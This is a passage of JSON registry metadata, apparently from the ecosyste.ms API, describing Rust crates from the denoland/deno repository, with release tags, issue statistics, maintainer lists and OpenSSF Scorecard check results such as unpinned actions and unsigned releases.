r.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T17:16:19.447Z","dependent_packages_count":1,"downloads":4575,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":36.13547592605184,"dependent_repos_count":16.690734510263486,"dependent_packages_count":18.15597474766567,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":14.208525006999352},"purl":"pkg:cargo/deno_3p_lib","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_3p_lib","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_3p_lib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_3p_lib/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/codemeta","maintainers":[{"uuid":"93727","login":"Lispython","name":"Alexandr","email":null,"url":"https://github.com/Lispython","packages_count":9,"html_url":"https://crates.io/users/Lispython","role":null,"created_at":"2022-11-07T18:29:18.808Z","updated_at":"2022-11-07T18:29:18.808Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/Lispython/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11092996,"name":"deno_permissions_extended","ecosystem":"cargo","description":"Provides the deno permissions implementation.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":5,"first_release_published_at":"2024-11-29T00:34:12.074Z","latest_release_published_at":"2024-11-29T21:08:52.315Z","latest_release_number":"0.41.0","last_synced_at":"2026-08-29T21:56:57.643Z","created_at":"2024-11-29T00:46:36.645Z","updated_at":"2026-08-29T21:56:57.643Z","registry_url":"https://crates.io/crates/deno_permissions_extended/","install_command":"cargo install deno_permissions_extended","documentation_url":"https://docs.rs/deno_permissions_extended/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow 